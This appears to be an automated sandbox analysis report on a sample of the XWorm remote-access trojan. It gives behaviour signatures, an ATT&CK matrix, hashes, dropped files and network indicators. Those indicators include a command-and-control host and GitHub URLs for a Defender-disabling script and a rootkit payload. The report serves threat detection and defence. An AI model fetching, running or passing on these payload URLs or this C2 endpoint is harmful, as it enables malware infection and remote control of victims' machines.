                Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe.bin.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: svchost.exe.bin.exe, 00000000.00000002.2413008460.0000000001066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe.bin.exe, 00000000.00000002.2416621621.000000001BCF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: svchost.exe.bin.exe, type: SAMPLE
                Source: Yara matchFile source: 0.0.svchost.exe.bin.exe.aa0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000000.1172627223.0000000000AA2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: svchost.exe.bin.exe PID: 6992, type: MEMORYSTR
                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exe, type: DROPPED

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: svchost.exe.bin.exe, type: SAMPLE
                Source: Yara matchFile source: 0.0.svchost.exe.bin.exe.aa0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000000.1172627223.0000000000AA2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: svchost.exe.bin.exe PID: 6992, type: MEMORYSTR
                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exe, type: DROPPED
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting
                Valid Accounts2
                Windows Management Instrumentation
                1
                Scripting
                1
                DLL Side-Loading
                1
                Disable or Modify Tools
                OS Credential Dumping1
                File and Directory Discovery
                Remote Services11
                Archive Collected Data
                1
                Ingress Tool Transfer
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Command and Scripting Interpreter
                1
                DLL Side-Loading
                11
                Process Injection
                1
                Deobfuscate/Decode Files or Information
                LSASS Memory23
                System Information Discovery
                Remote Desktop ProtocolData from Removable Media12
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Scheduled Task/Job
                1
                Scheduled Task/Job
                1
                Scheduled Task/Job
                1
                Obfuscated Files or Information
                Security Account Manager541
                Security Software Discovery
                SMB/Windows Admin SharesData from Network Shared Drive1
                Non-Standard Port
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts2
                PowerShell
                Login HookLogin Hook1
                Software Packing
                NTDS1
                Process Discovery
                Distributed Component Object ModelInput Capture2
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading
                LSA Secrets51
                Virtualization/Sandbox Evasion
                SSHKeylogging13
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Masquerading
                Cached Domain Credentials1
                Application Window Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items51
                Virtualization/Sandbox Evasion
                DCSync1
                System Network Configuration Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                Process Injection
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1634105 Sample: svchost.exe.bin.exe Startdate: 10/03/2025 Architecture: WINDOWS Score: 100 30 group-coupon.gl.at.ply.gg 2->30 32 raw.githubusercontent.com 2->32 34 2 other IPs or domains 2->34 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 Antivirus detection for URL or domain 2->48 50 15 other signatures 2->50 8 svchost.exe.bin.exe 5 2->8         started        13 svchost.exe.bin.exe 1 2->13         started        signatures3 process4 dnsIp5 36 group-coupon.gl.at.ply.gg 147.185.221.26, 24196, 49708 SALSGIVERUS United States 8->36 38 ip-api.com 208.95.112.1, 49699, 80 TUT-ASUS United States 8->38 40 raw.githubusercontent.com 185.199.108.133, 443, 49709 FASTLYUS Netherlands 8->40 24 C:\Users\user\AppData\...\svchost.exe.bin.exe, PE32 8->24 dropped 26 C:\...\svchost.exe.bin.exe:Zone.Identifier, ASCII 8->26 dropped 52 Suspicious powershell command line found 8->52 54 Tries to download and execute files (via powershell) 8->54 56 Bypasses PowerShell execution policy 8->56 62 2 other signatures 8->62 15 powershell.exe 14 18 8->15         started        18 schtasks.exe 1 8->18         started        28 C:\Users\user\...\svchost.exe.bin.exe.log, CSV 13->28 dropped 58 Antivirus detection for dropped file 13->58 60 Multi AV Scanner detection for dropped file 13->60 file6 signatures7 process8 dnsIp9 42 github.com 140.82.121.3, 443, 49703 GITHUBUS United States 15->42 20 conhost.exe 15->20         started        22 conhost.exe 18->22         started        process10

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                svchost.exe.bin.exe72%VirustotalBrowse
                svchost.exe.bin.exe76%ReversingLabsWin32.Exploit.Xworm
                svchost.exe.bin.exe100%AviraTR/Dropper.Gen
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\svchost.exe.bin.exe100%AviraTR/Dropper.Gen
                C:\Users\user\AppData\Roaming\svchost.exe.bin.exe76%ReversingLabsWin32.Exploit.Xworm
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                group-coupon.gl.at.ply.gg100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                github.com
                140.82.121.3
                truefalse
                  high
                  raw.githubusercontent.com
                  185.199.108.133
                  truefalse
                    high
                    ip-api.com
                    208.95.112.1
                    truefalse
                      high
                      group-coupon.gl.at.ply.gg
                      147.185.221.26
                      truetrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        group-coupon.gl.at.ply.ggtrue
                        • Avira URL Cloud: malware
                        unknown
                        http://ip-api.com/line/?fields=hostingfalse
                          high
                          NameSourceMaliciousAntivirus DetectionReputation
                          https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.batsvchost.exe.bin.exe, svchost.exe.bin.exe.0.drfalse
                            high
                            http://github.compowershell.exe, 00000003.00000002.2256212350.000002A781691000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.2285694720.000002A7901B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2285694720.000002A790072000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.2256212350.000002A780233000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://raw.githubusercontent.comsvchost.exe.bin.exe, 00000000.00000002.2415167409.0000000002DAA000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.2256212350.000002A780233000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://github.compowershell.exe, 00000003.00000002.2256212350.000002A781197000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2256212350.000002A78168B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exesvchost.exe.bin.exe.0.drfalse
                                          high
                                          https://go.micropowershell.exe, 00000003.00000002.2256212350.000002A781197000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://contoso.com/powershell.exe, 00000003.00000002.2285694720.000002A790072000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.2285694720.000002A7901B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2285694720.000002A790072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://contoso.com/Licensepowershell.exe, 00000003.00000002.2285694720.000002A790072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://ip-api.comsvchost.exe.bin.exe, 00000000.00000002.2415167409.0000000002DD9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe.bin.exe, 00000000.00000002.2415167409.0000000002DF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://raw.githubusercontent.comsvchost.exe.bin.exe, 00000000.00000002.2415167409.0000000002DAE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://contoso.com/Iconpowershell.exe, 00000003.00000002.2285694720.000002A790072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://aka.ms/pscore68powershell.exe, 00000003.00000002.2256212350.000002A780001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://raw.githubusercontent.com/76bh/img/main/Imagenep.pngsvchost.exe.bin.exe, svchost.exe.bin.exe.0.drfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namesvchost.exe.bin.exe, 00000000.00000002.2415167409.0000000002DD9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe.bin.exe, 00000000.00000002.2415167409.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2256212350.000002A780001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.2256212350.000002A780233000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://raw.githubusercontent.com/76bh/img/main/Imagenep.pngKeyTsvchost.exe.bin.exe, 00000000.00000002.2415167409.0000000002D8A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs
                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  208.95.112.1
                                                                  ip-api.comUnited States
                                                                  53334TUT-ASUSfalse
                                                                  185.199.108.133
                                                                  raw.githubusercontent.comNetherlands
                                                                  54113FASTLYUSfalse
                                                                  140.82.121.3
                                                                  github.comUnited States
                                                                  36459GITHUBUSfalse
                                                                  147.185.221.26
                                                                  group-coupon.gl.at.ply.ggUnited States
                                                                  12087SALSGIVERUStrue
                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                  Analysis ID:1634105
                                                                  Start date and time:2025-03-10 19:43:46 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 6m 26s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:16
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:svchost.exe.bin.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.evad.winEXE@8/7@4/4
                                                                  EGA Information:
                                                                  • Successful, ratio: 66.7%
                                                                  HCA Information:
                                                                  • Successful, ratio: 93%
                                                                  • Number of executed functions: 15
                                                                  • Number of non-executed functions: 3
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog
                                                                  • Execution Graph export aborted for target svchost.exe.bin.exe, PID 7352 because it is empty
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                  TimeTypeDescription
                                                                  14:44:57API Interceptor807750x Sleep call for process: powershell.exe modified
                                                                  14:46:44API Interceptor63x Sleep call for process: svchost.exe.bin.exe modified
                                                                  19:46:46Task SchedulerRun new task: svchost.exe.bin path: C:\Users\user\AppData\Roaming\svchost.exe.bin.exe
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  208.95.112.12bfuD5RgvF.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • ip-api.com/line/?fields=hosting
                                                                  bKGWA97fh3.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                  • ip-api.com/line/?fields=hosting
                                                                  Nuovo- ordine254546756464746646464.exeGet hashmaliciousGuLoaderBrowse
                                                                  • ip-api.com/line/?fields=hosting
                                                                  Nixware.crack by slut.exeGet hashmaliciousXWormBrowse
                                                                  • ip-api.com/line/?fields=hosting
                                                                  FUJFazcSyr.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                  • ip-api.com/line/?fields=hosting
                                                                  FUJFazcSyr.exeGet hashmaliciousAsyncRAT, DarkTortilla, XWormBrowse
                                                                  • ip-api.com/line/?fields=hosting
                                                                  DOC_7565684657689465637534565787684784664563473546754.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • ip-api.com/line/?fields=hosting
                                                                  SecuriteInfo.com.Trojan.Siggen21.26995.15475.25038.exeGet hashmaliciousPython Stealer, Blank Grabber, XWormBrowse
                                                                  • ip-api.com/json/?fields=225545
                                                                  Dropper.exeGet hashmaliciousAsyncRAT, Trap Stealer, XWormBrowse
                                                                  • ip-api.com/line/?fields=hosting
                                                                  SecuriteInfo.com.Win64.DropperX-gen.32756.21147.exeGet hashmaliciousUnknownBrowse
                                                                  • ip-api.com/line/172.58.121.183?fields=country
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  github.comCL_LauncherB1.exe1.exeGet hashmaliciousUnknownBrowse
                                                                  • 140.82.121.4
                                                                  CL_LauncherB1.exe1.exeGet hashmaliciousUnknownBrowse
                                                                  • 140.82.121.3
                                                                  https://github.com/fenwikk/rickroll/raw/main/roll.p1Get hashmaliciousUnknownBrowse
                                                                  • 140.82.121.4
                                                                  https://solinacenajdocs.gamerealm24.comGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                  • 140.82.121.3
                                                                  esFK2gm.exeGet hashmaliciousFallen Miner, XmrigBrowse
                                                                  • 140.82.121.4
                                                                  SecuriteInfo.com.Variant.Zusy.582702.20219.11785.exeGet hashmaliciousUnknownBrowse
                                                                  • 140.82.121.5
                                                                  SecuriteInfo.com.Variant.Zusy.582702.20219.11785.exeGet hashmaliciousUnknownBrowse
                                                                  • 140.82.121.6
                                                                  combined.exeGet hashmaliciousUnknownBrowse
                                                                  • 140.82.121.4
                                                                  https://live.dot.vu/p/dholcomb/landing-page-trends-report/Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                  • 140.82.121.3
                                                                  guard.exeGet hashmaliciousUnknownBrowse
                                                                  • 140.82.121.4
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  TUT-ASUS2bfuD5RgvF.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 208.95.112.1
                                                                  bKGWA97fh3.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                  • 208.95.112.1
                                                                  Nuovo- ordine254546756464746646464.exeGet hashmaliciousGuLoaderBrowse
                                                                  • 208.95.112.1
                                                                  Nixware.crack by slut.exeGet hashmaliciousXWormBrowse
                                                                  • 208.95.112.1
                                                                  FUJFazcSyr.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                  • 208.95.112.1
                                                                  FUJFazcSyr.exeGet hashmaliciousAsyncRAT, DarkTortilla, XWormBrowse
                                                                  • 208.95.112.1
                                                                  DOC_7565684657689465637534565787684784664563473546754.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 208.95.112.1
                                                                  SecuriteInfo.com.Trojan.Siggen21.26995.15475.25038.exeGet hashmaliciousPython Stealer, Blank Grabber, XWormBrowse
                                                                  • 208.95.112.1
                                                                  Dropper.exeGet hashmaliciousAsyncRAT, Trap Stealer, XWormBrowse
                                                                  • 208.95.112.1
                                                                  SecuriteInfo.com.Win64.DropperX-gen.32756.21147.exeGet hashmaliciousUnknownBrowse
                                                                  • 208.95.112.1
                                                                  SALSGIVERUSXClient.exe.bin.exeGet hashmaliciousXWormBrowse
                                                                  • 147.185.221.26
                                                                  Cat probiv.exeGet hashmaliciousNjratBrowse
                                                                  • 147.185.221.18
                                                                  Nixware.crack by slut.exeGet hashmaliciousXWormBrowse
                                                                  • 147.185.221.26
                                                                  CollapseLoader_2.0.1.exeGet hashmaliciousSheetRatBrowse
                                                                  • 147.185.221.26
                                                                  start.exeGet hashmaliciousUnknownBrowse
                                                                  • 147.185.221.26
                                                                  rc3e7pK8Qq.ps1Get hashmaliciousMetasploitBrowse
                                                                  • 147.185.221.24
                                                                  7uhEW3EXNl.ps1Get hashmaliciousMetasploitBrowse
                                                                  • 147.185.221.24
                                                                  jklsh4.elfGet hashmaliciousUnknownBrowse
                                                                  • 147.170.50.240
                                                                  GufLri6BEM.exeGet hashmaliciousNjratBrowse
                                                                  • 147.185.221.26
                                                                  HDASKJHDQ.exeGet hashmaliciousSheetRatBrowse
                                                                  • 147.185.221.26
                                                                  GITHUBUSCL_LauncherB1.exe1.exeGet hashmaliciousUnknownBrowse
                                                                  • 140.82.121.4
                                                                  CL_LauncherB1.exe1.exeGet hashmaliciousUnknownBrowse
                                                                  • 140.82.121.3
                                                                  https://github.com/fenwikk/rickroll/raw/main/roll.p1Get hashmaliciousUnknownBrowse
                                                                  • 140.82.121.4
                                                                  https://solinacenajdocs.gamerealm24.comGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                  • 140.82.121.3
                                                                  esFK2gm.exeGet hashmaliciousFallen Miner, XmrigBrowse
                                                                  • 140.82.121.4
                                                                  SecuriteInfo.com.Variant.Zusy.582702.20219.11785.exeGet hashmaliciousUnknownBrowse
                                                                  • 140.82.121.5
                                                                  SecuriteInfo.com.Variant.Zusy.582702.20219.11785.exeGet hashmaliciousUnknownBrowse
                                                                  • 140.82.121.6
                                                                  combined.exeGet hashmaliciousUnknownBrowse
                                                                  • 140.82.121.4
                                                                  https://live.dot.vu/p/dholcomb/landing-page-trends-report/Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                  • 140.82.121.3
                                                                  guard.exeGet hashmaliciousUnknownBrowse
                                                                  • 140.82.121.4
                                                                  FASTLYUSmain.exeGet hashmaliciousXmrigBrowse
                                                                  • 151.101.2.49
                                                                  https://dc1.convertc.com/event/v1/80401460/82362114/recentpurc/208463838.0153674575/6/cV9sU2Hc/B751BVZb/X.wgBlUMmEtoL7lLreHRS.dIbQhLbIKHVgjj1IvzEh_5AuOYVcDstYG0DCzEP9XO2LU-/click?url=https://gamma.app/docs/Sayer-Regan-Thayer-LLP-siiq7nvr7y2s7k4?mode=present#card-um3vy81gbcrpf02Get hashmaliciousUnknownBrowse
                                                                  • 151.101.2.217
                                                                  FW 188355..msgGet hashmaliciousHTMLPhisherBrowse
                                                                  • 199.232.214.172
                                                                  Ontbrekende urenstaat.htmlGet hashmaliciousUnknownBrowse
                                                                  • 151.101.1.229
                                                                  https://publizr.com/alliedcon/allied-constructionGet hashmaliciousGabagoolBrowse
                                                                  • 151.101.1.229
                                                                  https://publizr.com/alliedcon/allied-constructionGet hashmaliciousGabagoolBrowse
                                                                  • 151.101.2.137
                                                                  https://github.com/fenwikk/rickroll/raw/main/roll.p1Get hashmaliciousUnknownBrowse
                                                                  • 185.199.109.133
                                                                  RECHNUNG_Lieferschein_001927.htmGet hashmaliciousUnknownBrowse
                                                                  • 151.101.194.137
                                                                  http://raretoonsindia.coGet hashmaliciousUnknownBrowse
                                                                  • 199.232.192.193
                                                                  https://kwikkopyegypt.com/wp-admin/mail.verify/interface.root/login.php/inbox.html#jake.totam@southwark.anglican.orgGet hashmaliciousHTMLPhisherBrowse
                                                                  • 151.101.130.137
                                                                  No context
                                                                  No context
                                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe.bin.exe
                                                                  File Type:CSV text
                                                                  Category:dropped
                                                                  Size (bytes):654
                                                                  Entropy (8bit):5.380476433908377
                                                                  Encrypted:false
                                                                  SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                  MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                  SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                  SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                  SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                  Malicious:true
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):9434
                                                                  Entropy (8bit):4.928515784730612
                                                                  Encrypted:false
                                                                  SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                                                  MD5:D3594118838EF8580975DDA877E44DEB
                                                                  SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                                                  SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                                                  SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):1660
                                                                  Entropy (8bit):5.670071829308526
                                                                  Encrypted:false
                                                                  SSDEEP:48:ZSU4y4RQmFoUeCamfm9qr9tK8NLF5qu9OjlZS5Gyz:YHyIFKL2O9qr2KLF5FOZZ4jz
                                                                  MD5:B1C6A06215F43E0B5C97406F88E7E9D7
                                                                  SHA1:0638073C8C5204A9528D931C3B4D54B0D2A71479
                                                                  SHA-256:89AEC9BBEEF177BF834E1971B7243DF85511A8553FBF72F7C4205FC2F8B36884
                                                                  SHA-512:CC387FDA1020933B39B29DA454EEB91CA7BA3F625347A4FA27B8A30A7A5A29AE9DC23082A048BD6354ADA2ACFC44DEDABEE9A273622346005C28C6D35AEE6030
                                                                  Malicious:false
                                                                  Preview:@...e..........._....................................@..........@...............M6.]..O....PI.&........System.Web.Extensions...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Users\user\Desktop\svchost.exe.bin.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):59392
                                                                  Entropy (8bit):5.575024304396373
                                                                  Encrypted:false
                                                                  SSDEEP:1536:WWsAalSKXHuSQRh5FgrbsN/+zn/QbOXTP:WWsAawK3+5FIbsMz/QbOr
                                                                  MD5:2B42433CC8D3450D015D04A3C8662558
                                                                  SHA1:0932042702ED80152A37C564AEB2114DC48DD3AF
                                                                  SHA-256:075151678431E9ED1A6F26563F7A2143517BEC7741C6DC53A106FBAD4FE2D41A
                                                                  SHA-512:880A4975CF19CD5EE71A4385F5EC786018D3416ADDB5A3F21A863614C85490521CCBFFAB762F2DBC04B2873D53B9E9D5C8DD34FA4B1892BD76A057C9E61DB254
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exe, Author: Joe Security
                                                                  • Rule: rat_win_xworm_v2, Description: Finds XWorm v2 samples based on characteristic strings, Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exe, Author: Sekoia.io
